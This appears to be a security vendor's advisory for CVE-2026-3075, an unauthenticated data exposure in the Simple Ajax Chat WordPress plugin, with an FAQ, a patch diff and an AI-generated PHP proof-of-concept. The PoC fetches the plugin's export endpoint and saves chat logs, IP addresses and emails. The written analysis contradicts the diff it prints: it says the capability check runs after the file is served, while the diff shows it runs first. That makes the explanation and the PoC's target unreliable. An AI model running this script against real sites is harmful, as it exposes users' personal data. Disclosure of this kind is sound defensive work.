What is CVE-2026-3075?

CVE-2026-3075 is a medium severity vulnerability in the Simple Ajax Chat plugin for WordPress. It allows unauthenticated attackers to access sensitive user and configuration data by downloading a CSV file containing chat messages and user information.

How does the vulnerability work?

The vulnerability exists in the export.php script of the Simple Ajax Chat plugin, which serves a CSV file without proper user authentication checks. Attackers can send a GET request to the export endpoint to retrieve sensitive data without needing to log in.

Who is affected by this vulnerability?

Any WordPress site using the Simple Ajax Chat plugin version 20251121 or earlier is affected by this vulnerability. Administrators should check their plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Simple Ajax Chat plugin installed on your WordPress site. If it is 20251121 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

To fix the vulnerability, update the Simple Ajax Chat plugin to version 20260217 or later, which includes a patch that implements proper authentication checks for the export functionality.

What does the CVSS score of 5.3 indicate?

The CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to data exposure if exploited.

What is a proof of concept (PoC) and how does it relate to this vulnerability?

A proof of concept is a demonstration that shows how a vulnerability can be exploited. In this case, the provided PoC PHP script illustrates how an attacker can access the vulnerable export endpoint to download sensitive data without authentication.

What are the potential risks of not addressing this vulnerability?

Failing to address this vulnerability could lead to unauthorized access to sensitive user data, resulting in privacy breaches, social engineering attacks, and reputational damage to the affected site.

What additional measures can I take to secure my WordPress site?

In addition to updating vulnerable plugins, implement regular security audits, use strong passwords, enable two-factor authentication, and consider employing a web application firewall to enhance the security of your WordPress site.

How does the patch improve security?

The patch for CVE-2026-3075 introduces a random export key mechanism that requires a valid key to access the export functionality. This ensures that only authorized users can trigger data exports, significantly reducing the risk of unauthorized data exposure.

Is it safe to continue using Simple Ajax Chat after the patch?

After updating to the patched version 20260217, the Simple Ajax Chat plugin should be safe to use. However, it is important to stay informed about future vulnerabilities and maintain regular updates.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-3075: Simple Ajax Chat <= 20251121 – Unauthenticated Information Exposure (simple-ajax-chat)

Q: What kind of data is exposed through this vulnerability?

Exploitation of this vulnerability can expose sensitive information including user IP addresses, display names, email addresses, and chat message content, which can lead to further attacks or privacy violations.

CVE ID CVE-2026-3075

Plugin simple-ajax-chat

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 20251121

Patched Version 20260217

Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3075:
The Simple Ajax Chat WordPress plugin contains an unauthenticated information exposure vulnerability. This flaw allows attackers to download a CSV file containing all chat messages and user data without authentication. The vulnerability affects all plugin versions up to and including 20251121.

Atomic Edge research identifies the root cause in the `/simple-ajax-chat/exports/export.php` file. The script directly serves the `sac-export.csv` file without verifying user permissions. The file path is hardcoded on line 17 of the vulnerable version. The `readfile()` function on line 27 outputs the file contents directly to the browser. The script only checks for the `manage_options` capability on line 13, but this check occurs after the file operations. The vulnerability exists because the file serving logic executes before any permission validation.

Exploitation requires direct access to the export endpoint. Attackers send a GET request to `/wp-content/plugins/simple-ajax-chat/exports/export.php`. No authentication, nonces, or special parameters are needed. The server responds with the CSV file attachment containing all chat messages. The exported data includes user IP addresses, names, messages, and timestamps as shown in the `sac_export_chats()` function starting at line 309 of `simple-ajax-chat-admin.php`.

The patch introduces a random export key mechanism. The `sac_update_export_key()` function generates a 30-character random string stored in the `sac_export` option. The export file name changes from `sac-export.csv` to `sac-export-{key}.csv`. The `export.php` script now retrieves this key via `get_option(‘sac_export’, false)` on line 17. File operations only proceed if a valid key exists. The patch also updates the file deletion logic in `sac_delete_export()` and adds cleanup during uninstallation.

Successful exploitation exposes all chat conversation history. Attackers obtain user IP addresses, display names, email addresses, website URLs, and message content. This data enables social engineering, targeted phishing, and user profiling. The exposed information violates privacy regulations and can facilitate further attacks against chat participants.

Differential between vulnerable and patched code

Code Diff

--- a/simple-ajax-chat/exports/export.php
+++ b/simple-ajax-chat/exports/export.php
@@ -14,22 +14,28 @@

 	if (!current_user_can('manage_options')) wp_die(__('Sorry, you are not allowed to export data.', 'simple-ajax-chat'));

-	$file = 'sac-export.csv';
+	$key = get_option('sac_export', false);

-	$size = (string) filesize($file);
+	$file = $key ? 'sac-export-'. $key .'.csv' : false;

-	header('Expires: 0');
-	header('Pragma: public');
-	header('Cache-Control: public');
-	header('Content-Length: '. $size);
-	header('Content-Type: application/csv');
-	header('Content-Description: SAC Export Download');
-	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
-	header('Content-Disposition: attachment; filename=sac-export.csv');
-
-	readfile($file);
-
-	exit();
+	if ($file) {
+
+		$size = (string) filesize($file);
+
+		header('Expires: 0');
+		header('Pragma: public');
+		header('Cache-Control: public');
+		header('Content-Length: '. $size);
+		header('Content-Type: application/csv');
+		header('Content-Description: SAC Export Download');
+		header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+		header('Content-Disposition: attachment; filename='. $file);
+
+		readfile($file);
+
+		exit();
+
+	}

 }

--- a/simple-ajax-chat/simple-ajax-chat-admin.php
+++ b/simple-ajax-chat/simple-ajax-chat-admin.php
@@ -290,6 +290,31 @@



+// add random export key
+function sac_update_export_key() {
+
+	$key = get_option('sac_export', false);
+
+	if (!$key) {
+
+		$key = wp_generate_password(30, false);
+
+		$update = update_option('sac_export', $key);
+
+		$update = $update ? __('SAC: successfully added export key', 'simple-ajax-chat') : __('SAC: failed to add export key', 'simple-ajax-chat');
+
+		$log = apply_filters('sac_update_export_key_log', false);
+
+		if ($log) error_log(print_r($update, true));
+
+	}
+
+	return $key;
+
+}
+
+
+
 // export chat messages
 function sac_export_chats() {

@@ -309,7 +334,9 @@

 	$site_url = get_bloginfo('url');

-	$export = plugin_dir_path(__FILE__) .'exports/sac-export.csv';
+	$key = sac_update_export_key();
+
+	$export = $key ? plugin_dir_path(__FILE__) .'exports/sac-export-'. $key .'.csv' : false;

 	$fp = fopen($export, 'w');

@@ -393,12 +420,18 @@

 	}

-	$filepath = plugin_dir_path(__FILE__) .'exports/sac-export.csv';
+	$key = get_option('sac_export', false);

-	if (file_exists($filepath)) {
+	if ($key) {

-		$output .= '<p><a href="'. esc_url($delete_href) .'">'. esc_html__('Delete CSV File', 'simple-ajax-chat') .'</a></p>';
+		$file = plugin_dir_path(__FILE__) .'exports/sac-export-'. $key .'.csv';
+
+		if (file_exists($file)) {

+			$output .= '<p><a href="'. esc_url($delete_href) .'">'. esc_html__('Delete CSV File', 'simple-ajax-chat') .'</a></p>';
+
+		}
+
 	}

 	return $output;
@@ -416,11 +449,19 @@

 	if (!current_user_can('manage_options')) wp_die(__('Sorry, you are not allowed to export data.', 'simple-ajax-chat'));

-	$file = plugin_dir_path(__FILE__) .'exports/sac-export.csv';
+	$key = get_option('sac_export', false);

-	if (file_exists($file)) {
+	if ($key) {
+
+		$file = plugin_dir_path(__FILE__) .'exports/sac-export-'. $key .'.csv';

-		unlink($file);
+		if (file_exists($file)) {
+
+			unlink($file);
+
+			delete_option('sac_export');
+
+		}

 	}

@@ -1268,12 +1309,9 @@

 			<div class="notice notice-success notice-lh">
 				<p>
-					<strong><?php esc_html_e('Fall Sale!', 'simple-ajax-chat'); ?></strong>
-					<?php esc_html_e('Take 25% OFF any of our', 'simple-ajax-chat'); ?>
-					<a target="_blank" rel="noopener noreferrer" href="https://plugin-planet.com/"><?php esc_html_e('Pro WordPress plugins', 'simple-ajax-chat'); ?></a>
-					<?php esc_html_e('and', 'simple-ajax-chat'); ?>
-					<a target="_blank" rel="noopener noreferrer" href="https://books.perishablepress.com/"><?php esc_html_e('books', 'simple-ajax-chat'); ?></a>.
-					<?php esc_html_e('Apply code', 'simple-ajax-chat'); ?> <code>FALL2025</code> <?php esc_html_e('at checkout. Sale ends 1/11/2026.', 'simple-ajax-chat'); ?>
+					<strong><?php esc_html_e('😎 SAVE 30% on SAC Pro!', 'simple-ajax-chat'); ?></strong>
+					<a target="_blank" rel="noopener noreferrer" href="https://plugin-planet.com/simple-ajax-chat-pro/"><?php esc_html_e('Level up your chat game with powerful features and unlimited chat forms', 'simple-ajax-chat'); ?></a>.
+					<?php esc_html_e('Apply code', 'simple-ajax-chat'); ?> <code>SACPRO</code> <?php esc_html_e('at checkout. Sale ends 3/28/2026.', 'simple-ajax-chat'); ?>
 					<?php echo sac_dismiss_notice_link(); ?>
 				</p>
 			</div>
@@ -1356,7 +1394,7 @@

 function sac_check_date_expired() {

-	$expires = apply_filters('sac_check_date_expired', '2026-01-11');
+	$expires = apply_filters('sac_check_date_expired', '2026-03-28');

 	return (new DateTime() > new DateTime($expires)) ? true : false;

--- a/simple-ajax-chat/simple-ajax-chat.php
+++ b/simple-ajax-chat/simple-ajax-chat.php
@@ -10,15 +10,13 @@
 	Contributors: specialk
 	Requires at least: 4.7
 	Tested up to: 6.9
-	Stable tag: 20251121
-	Version:    20251121
+	Stable tag: 20260217
+	Version:    20260217
 	Requires PHP: 5.6.20
 	Text Domain: simple-ajax-chat
 	Domain Path: /languages
 	License: GPL v2 or later
-*/
-
-/*
+
 	This program is free software; you can redistribute it and/or
 	modify it under the terms of the GNU General Public License
 	as published by the Free Software Foundation; either version
@@ -32,13 +30,13 @@
 	You should have received a copy of the GNU General Public License
 	with this program. If not, visit: https://www.gnu.org/licenses/

-	Copyright 2025 Monzilla Media. All rights reserved.
+	Copyright 2012-2026 Monzilla Media. All rights reserved.
 */

 if (!defined('ABSPATH')) exit;

 if (!defined('SIMPLE_AJAX_CHAT_WP_VERS'))   define('SIMPLE_AJAX_CHAT_WP_VERS',   '4.7');
-if (!defined('SIMPLE_AJAX_CHAT_VERSION'))   define('SIMPLE_AJAX_CHAT_VERSION',   '20251121');
+if (!defined('SIMPLE_AJAX_CHAT_VERSION'))   define('SIMPLE_AJAX_CHAT_VERSION',   '20260217');
 if (!defined('SIMPLE_AJAX_CHAT_NAME'))      define('SIMPLE_AJAX_CHAT_NAME',      'Simple Ajax Chat');
 if (!defined('SIMPLE_AJAX_CHAT_HOME'))      define('SIMPLE_AJAX_CHAT_HOME',      'https://perishablepress.com/simple-ajax-chat/');
 if (!defined('SIMPLE_AJAX_CHAT_FILE'))      define('SIMPLE_AJAX_CHAT_FILE',      __FILE__);
--- a/simple-ajax-chat/uninstall.php
+++ b/simple-ajax-chat/uninstall.php
@@ -11,6 +11,7 @@
 // delete sac options
 delete_option('sac_options');
 delete_option('sac_censors');
+delete_option('sac_export');
 delete_option('simple-ajax-chat-dismiss-notice');

 // delete sac transients

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3075 - Simple Ajax Chat <= 20251121 - Unauthenticated Information Exposure

<?php

$target_url = 'https://vulnerable-site.com';

// Construct the direct path to the vulnerable export script
$export_endpoint = '/wp-content/plugins/simple-ajax-chat/exports/export.php';
$full_url = $target_url . $export_endpoint;

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $full_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch) . "n";
    curl_close($ch);
    exit(1);
}

curl_close($ch);

// Analyze the response
if ($http_code === 200 && !empty($response)) {
    // Check if response appears to be CSV data
    if (strpos($response, ',') !== false || strpos($response, 'n') !== false) {
        echo "[+] SUCCESS: CSV data retrievedn";
        echo "[+] Response length: " . strlen($response) . " bytesn";
        
        // Display first few lines of the CSV
        $lines = explode("n", $response);
        echo "[+] First 5 lines of CSV:n";
        for ($i = 0; $i < min(5, count($lines)); $i++) {
            echo $lines[$i] . "n";
        }
        
        // Optionally save to file
        file_put_contents('sac_export.csv', $response);
        echo "[+] Data saved to sac_export.csvn";
    } else {
        echo "[-] Response does not appear to be CSV datan";
        echo "[-] Response preview: " . substr($response, 0, 200) . "n";
    }
} else {
    echo "[-] FAILED: HTTP $http_coden";
    echo "[-] Response preview: " . substr($response, 0, 200) . "n";
}

?>

Frequently Asked Questions

What is CVE-2026-3075?
Overview of the vulnerability
CVE-2026-3075 is a medium severity vulnerability in the Simple Ajax Chat plugin for WordPress. It allows unauthenticated attackers to access sensitive user and configuration data by downloading a CSV file containing chat messages and user information.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists in the export.php script of the Simple Ajax Chat plugin, which serves a CSV file without proper user authentication checks. Attackers can send a GET request to the export endpoint to retrieve sensitive data without needing to log in.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Simple Ajax Chat plugin version 20251121 or earlier is affected by this vulnerability. Administrators should check their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Simple Ajax Chat plugin installed on your WordPress site. If it is 20251121 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Mitigation steps
To fix the vulnerability, update the Simple Ajax Chat plugin to version 20260217 or later, which includes a patch that implements proper authentication checks for the export functionality.
What does the CVSS score of 5.3 indicate?
Understanding severity levels
The CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to data exposure if exploited.
What kind of data is exposed through this vulnerability?
Types of sensitive information at risk
Exploitation of this vulnerability can expose sensitive information including user IP addresses, display names, email addresses, and chat message content, which can lead to further attacks or privacy violations.
What is a proof of concept (PoC) and how does it relate to this vulnerability?
Demonstrating the exploit
A proof of concept is a demonstration that shows how a vulnerability can be exploited. In this case, the provided PoC PHP script illustrates how an attacker can access the vulnerable export endpoint to download sensitive data without authentication.
What are the potential risks of not addressing this vulnerability?
Consequences of inaction
Failing to address this vulnerability could lead to unauthorized access to sensitive user data, resulting in privacy breaches, social engineering attacks, and reputational damage to the affected site.
What additional measures can I take to secure my WordPress site?
Best practices for WordPress security
In addition to updating vulnerable plugins, implement regular security audits, use strong passwords, enable two-factor authentication, and consider employing a web application firewall to enhance the security of your WordPress site.
How does the patch improve security?
Changes made in the updated version
The patch for CVE-2026-3075 introduces a random export key mechanism that requires a valid key to access the export functionality. This ensures that only authorized users can trigger data exports, significantly reducing the risk of unauthorized data exposure.
Is it safe to continue using Simple Ajax Chat after the patch?
Evaluating plugin safety post-fix
After updating to the patched version 20260217, the Simple Ajax Chat plugin should be safe to use. However, it is important to stay informed about future vulnerabilities and maintain regular updates.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations